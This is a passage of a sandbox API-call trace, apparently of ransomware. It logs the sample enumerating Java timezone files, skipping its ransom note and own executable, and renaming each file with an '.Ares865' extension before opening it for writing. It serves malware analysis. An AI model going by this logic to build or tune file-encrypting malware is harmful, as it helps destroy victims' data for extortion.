hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7457b600, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7457b600, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7457b600, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x330, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ojinaga", cAlternateFileName="")) returned 1 [0135.527] lstrcmpiW (lpString1="Ojinaga", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0135.527] lstrcmpiW (lpString1="Ojinaga", lpString2="aoldtz.exe") returned 1 [0135.527] lstrcpyW (in: lpString1=0x2cce460, lpString2="Ojinaga" | out: lpString1="Ojinaga") returned="Ojinaga" [0135.528] lstrlenW (lpString="Ojinaga") returned 7 [0135.528] lstrlenW (lpString="Ares865") returned 7 [0135.528] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Ojinaga.Ares865") returned 63 [0135.528] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Ojinaga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\ojinaga"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Ojinaga.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\ojinaga.ares865"), dwFlags=0x1) returned 1 [0135.529] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Ojinaga.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\ojinaga.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.529] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=816) returned 1 [0135.532] lstrcpyW (in: lpString1=0x2cce460, lpString2="Panama" | out: lpString1="Panama") returned="Panama" [0135.532] lstrlenW (lpString="Panama") returned 6 [0135.532] lstrlenW (lpString="Ares865") returned 7 [0135.532] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Panama.Ares865") returned 62 [0135.532] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Panama" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\panama"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Panama.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\panama.ares865"), dwFlags=0x1) returned 1 [0135.534] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Panama.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\panama.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.534] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.537] lstrcpyW (in: lpString1=0x2cce460, lpString2="Pangnirtung" | out: lpString1="Pangnirtung") returned="Pangnirtung" [0135.537] lstrlenW (lpString="Pangnirtung") returned 11 [0135.537] lstrlenW (lpString="Ares865") returned 7 [0135.537] lstrcmpiW (lpString1="nirtung", lpString2="Ares865") returned 1 [0135.538] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Pangnirtung.Ares865") returned 67 [0135.538] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Pangnirtung" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\pangnirtung"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Pangnirtung.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\pangnirtung.ares865"), dwFlags=0x1) returned 1 [0135.539] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Pangnirtung.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\pangnirtung.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.539] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1076) returned 1 [0135.542] lstrcpyW (in: lpString1=0x2cce460, lpString2="Paramaribo" | out: lpString1="Paramaribo") returned="Paramaribo" [0135.542] lstrlenW (lpString="Paramaribo") returned 10 [0135.542] lstrlenW (lpString="Ares865") returned 7 [0135.542] lstrcmpiW (lpString1="amaribo", lpString2="Ares865") returned -1 [0135.542] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Paramaribo.Ares865") returned 66 [0135.542] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Paramaribo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\paramaribo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Paramaribo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\paramaribo.ares865"), dwFlags=0x1) returned 1 [0135.544] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Paramaribo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\paramaribo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.544] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=101) returned 1 [0135.547] lstrcpyW (in: lpString1=0x2cce460, lpString2="Phoenix" | out: lpString1="Phoenix") returned="Phoenix" [0135.547] lstrlenW (lpString="Phoenix") returned 7 [0135.547] lstrlenW (lpString="Ares865") returned 7 [0135.547] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Phoenix.Ares865") returned 63 [0135.547] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Phoenix" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\phoenix"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Phoenix.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\phoenix.ares865"), dwFlags=0x1) returned 1 [0135.549] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Phoenix.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\phoenix.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.549] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=141) returned 1 [0135.553] lstrcpyW (in: lpString1=0x2cce460, lpString2="Port-au-Prince" | out: lpString1="Port-au-Prince") returned="Port-au-Prince" [0135.553] lstrlenW (lpString="Port-au-Prince") returned 14 [0135.553] lstrlenW (lpString="Ares865") returned 7 [0135.553] lstrcmpiW (lpString1="-Prince", lpString2="Ares865") returned 1 [0135.553] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port-au-Prince.Ares865") returned 70 [0135.553] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port-au-Prince" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port-au-prince"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port-au-Prince.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port-au-prince.ares865"), dwFlags=0x1) returned 1 [0135.554] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port-au-Prince.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port-au-prince.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.555] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=788) returned 1 [0135.557] lstrcpyW (in: lpString1=0x2cce460, lpString2="Porto_Velho" | out: lpString1="Porto_Velho") returned="Porto_Velho" [0135.557] lstrlenW (lpString="Porto_Velho") returned 11 [0135.557] lstrlenW (lpString="Ares865") returned 7 [0135.557] lstrcmpiW (lpString1="o_Velho", lpString2="Ares865") returned 1 [0135.558] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Porto_Velho.Ares865") returned 67 [0135.558] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Porto_Velho" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\porto_velho"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Porto_Velho.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\porto_velho.ares865"), dwFlags=0x1) returned 1 [0135.559] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Porto_Velho.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\porto_velho.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.559] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=297) returned 1 [0135.562] lstrcpyW (in: lpString1=0x2cce460, lpString2="Port_of_Spain" | out: lpString1="Port_of_Spain") returned="Port_of_Spain" [0135.562] lstrlenW (lpString="Port_of_Spain") returned 13 [0135.562] lstrlenW (lpString="Ares865") returned 7 [0135.562] lstrcmpiW (lpString1="f_Spain", lpString2="Ares865") returned 1 [0135.563] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port_of_Spain.Ares865") returned 69 [0135.563] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port_of_Spain" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port_of_spain"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port_of_Spain.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port_of_spain.ares865"), dwFlags=0x1) returned 1 [0135.564] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port_of_Spain.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port_of_spain.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.564] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.567] lstrcpyW (in: lpString1=0x2cce460, lpString2="Puerto_Rico" | out: lpString1="Puerto_Rico") returned="Puerto_Rico" [0135.567] lstrlenW (lpString="Puerto_Rico") returned 11 [0135.567] lstrlenW (lpString="Ares865") returned 7 [0135.567] lstrcmpiW (lpString1="to_Rico", lpString2="Ares865") returned 1 [0135.568] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Puerto_Rico.Ares865") returned 67 [0135.568] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Puerto_Rico" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\puerto_rico"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Puerto_Rico.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\puerto_rico.ares865"), dwFlags=0x1) returned 1 [0135.569] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Puerto_Rico.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\puerto_rico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.569] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0135.572] lstrcpyW (in: lpString1=0x2cce460, lpString2="Rainy_River" | out: lpString1="Rainy_River") returned="Rainy_River" [0135.572] lstrlenW (lpString="Rainy_River") returned 11 [0135.572] lstrlenW (lpString="Ares865") returned 7 [0135.572] lstrcmpiW (lpString1="y_River", lpString2="Ares865") returned 1 [0135.573] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rainy_River.Ares865") returned 67 [0135.573] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rainy_River" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rainy_river"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rainy_River.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rainy_river.ares865"), dwFlags=0x1) returned 1 [0135.577] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rainy_River.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rainy_river.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.577] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1144) returned 1 [0135.581] lstrcpyW (in: lpString1=0x2cce460, lpString2="Rankin_Inlet" | out: lpString1="Rankin_Inlet") returned="Rankin_Inlet" [0135.581] lstrlenW (lpString="Rankin_Inlet") returned 12 [0135.581] lstrlenW (lpString="Ares865") returned 7 [0135.581] lstrcmpiW (lpString1="n_Inlet", lpString2="Ares865") returned 1 [0135.581] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rankin_Inlet.Ares865") returned 68 [0135.581] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rankin_Inlet" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rankin_inlet"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rankin_Inlet.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rankin_inlet.ares865"), dwFlags=0x1) returned 1 [0135.582] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rankin_Inlet.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rankin_inlet.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.583] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1052) returned 1 [0135.586] lstrcpyW (in: lpString1=0x2cce460, lpString2="Recife" | out: lpString1="Recife") returned="Recife" [0135.586] lstrlenW (lpString="Recife") returned 6 [0135.586] lstrlenW (lpString="Ares865") returned 7 [0135.586] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Recife.Ares865") returned 62 [0135.586] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Recife" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\recife"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Recife.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\recife.ares865"), dwFlags=0x1) returned 1 [0135.588] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Recife.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\recife.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=377) returned 1 [0135.591] lstrcpyW (in: lpString1=0x2cce460, lpString2="Regina" | out: lpString1="Regina") returned="Regina" [0135.591] lstrlenW (lpString="Regina") returned 6 [0135.591] lstrlenW (lpString="Ares865") returned 7 [0135.591] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Regina.Ares865") returned 62 [0135.591] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Regina" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\regina"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Regina.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\regina.ares865"), dwFlags=0x1) returned 1 [0135.593] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Regina.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\regina.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.593] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=481) returned 1 [0135.596] lstrcpyW (in: lpString1=0x2cce460, lpString2="Resolute.Ares865" | out: lpString1="Resolute.Ares865") returned="Resolute.Ares865" [0135.596] lstrlenW (lpString="Resolute.Ares865") returned 16 [0135.596] lstrlenW (lpString="Ares865") returned 7 [0135.596] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0135.596] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x131, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rio_Branco", cAlternateFileName="RIO_BR~1")) returned 1 [0135.596] lstrcmpiW (lpString1="Rio_Branco", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0135.596] lstrcmpiW (lpString1="Rio_Branco", lpString2="aoldtz.exe") returned 1 [0135.596] lstrcpyW (in: lpString1=0x2cce460, lpString2="Rio_Branco" | out: lpString1="Rio_Branco") returned="Rio_Branco" [0135.596] lstrlenW (lpString="Rio_Branco") returned 10 [0135.596] lstrlenW (lpString="Ares865") returned 7 [0135.596] lstrcmpiW (lpString1="_Branco", lpString2="Ares865") returned -1 [0135.597] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rio_Branco.Ares865") returned 66 [0135.597] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rio_Branco" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rio_branco"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rio_Branco.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rio_branco.ares865"), dwFlags=0x1) returned 1 [0135.598] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rio_Branco.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rio_branco.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.598] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=305) returned 1 [0135.602] lstrcpyW (in: lpString1=0x2cce460, lpString2="Santarem" | out: lpString1="Santarem") returned="Santarem" [0135.602] lstrlenW (lpString="Santarem") returned 8 [0135.602] lstrlenW (lpString="Ares865") returned 7 [0135.602] lstrcmpiW (lpString1="antarem", lpString2="Ares865") returned -1 [0135.602] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santarem.Ares865") returned 64 [0135.602] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santarem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santarem"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santarem.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santarem.ares865"), dwFlags=0x1) returned 1 [0135.604] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santarem.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santarem.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.604] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=305) returned 1 [0135.608] lstrcpyW (in: lpString1=0x2cce460, lpString2="Santa_Isabel" | out: lpString1="Santa_Isabel") returned="Santa_Isabel" [0135.608] lstrlenW (lpString="Santa_Isabel") returned 12 [0135.608] lstrlenW (lpString="Ares865") returned 7 [0135.608] lstrcmpiW (lpString1="_Isabel", lpString2="Ares865") returned -1 [0135.608] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santa_Isabel.Ares865") returned 68 [0135.608] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santa_Isabel" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santa_isabel"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santa_Isabel.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santa_isabel.ares865"), dwFlags=0x1) returned 1 [0135.610] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santa_Isabel.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santa_isabel.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.610] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1276) returned 1 [0135.613] lstrcpyW (in: lpString1=0x2cce460, lpString2="Santiago" | out: lpString1="Santiago") returned="Santiago" [0135.613] lstrlenW (lpString="Santiago") returned 8 [0135.613] lstrlenW (lpString="Ares865") returned 7 [0135.613] lstrcmpiW (lpString1="antiago", lpString2="Ares865") returned -1 [0135.613] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santiago.Ares865") returned 64 [0135.613] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santiago" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santiago"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santiago.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santiago.ares865"), dwFlags=0x1) returned 1 [0135.614] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santiago.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santiago.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.615] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1368) returned 1 [0135.617] lstrcpyW (in: lpString1=0x2cce460, lpString2="Santo_Domingo" | out: lpString1="Santo_Domingo") returned="Santo_Domingo" [0135.617] lstrlenW (lpString="Santo_Domingo") returned 13 [0135.617] lstrlenW (lpString="Ares865") returned 7 [0135.617] lstrcmpiW (lpString1="Domingo", lpString2="Ares865") returned 1 [0135.618] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santo_Domingo.Ares865") returned 69 [0135.618] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santo_Domingo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santo_domingo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santo_Domingo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santo_domingo.ares865"), dwFlags=0x1) returned 1 [0135.619] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santo_Domingo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santo_domingo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.619] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=201) returned 1 [0135.623] lstrcpyW (in: lpString1=0x2cce460, lpString2="Sao_Paulo" | out: lpString1="Sao_Paulo") returned="Sao_Paulo" [0135.623] lstrlenW (lpString="Sao_Paulo") returned 9 [0135.623] lstrlenW (lpString="Ares865") returned 7 [0135.623] lstrcmpiW (lpString1="o_Paulo", lpString2="Ares865") returned 1 [0135.623] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sao_Paulo.Ares865") returned 65 [0135.623] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sao_Paulo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sao_paulo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sao_Paulo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sao_paulo.ares865"), dwFlags=0x1) returned 1 [0135.624] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sao_Paulo.Ares865" (normalized: "c:\\program files 